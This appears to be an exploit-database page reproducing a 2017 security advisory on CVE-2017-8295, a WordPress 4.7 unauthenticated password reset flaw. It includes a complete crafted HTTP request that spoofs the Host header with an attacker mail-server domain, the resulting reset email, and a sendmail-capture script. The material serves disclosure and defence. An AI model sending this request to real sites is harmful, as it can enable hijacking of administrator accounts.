header-logo
Suggest Exploit
vendor:
WordPress
by:
Dawid Golunski
5,9
CVSS
MEDIUM
Unauthenticated Password Reset
200
CWE
Product Name: WordPress
Affected Version From: WordPress 4.7
Affected Version To: WordPress 4.7
Patch Exists: YES
Related CWE: CVE-2017-8295
CPE: a:wordpress:wordpress
Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-8295/https://www.rapid7.com/db/vulnerabilities/wordpress-cve-2017-8295/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

WordPress 4.7 Unauthenticated Password Reset 0day (CVE-2017-8295)

WordPress 4.7 is vulnerable to an unauthenticated password reset vulnerability due to improper validation of the SERVER_NAME variable. An attacker can send a specially crafted HTTP request with a modified HOST header to trigger the password reset function for the admin user account. This will result in the WordPress application passing the attacker's domain in the Return-Path, From, and Message-ID fields of the email sent to reset the password.

Mitigation:

Ensure that the SERVER_NAME variable is properly validated before using it in the password reset email.
Source

Exploit-DB raw data:

=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================

Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------


Wordpress will trigger the password reset function for the admin user account.

Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:


------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

-------------------------------


As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.


The verification of the headers can be performed by replacing /usr/sbin/sendmail with a 
bash script of:

#!/bin/bash
cat > /tmp/outgoing-email

Navigation

Suggest Exploit

Services By CQR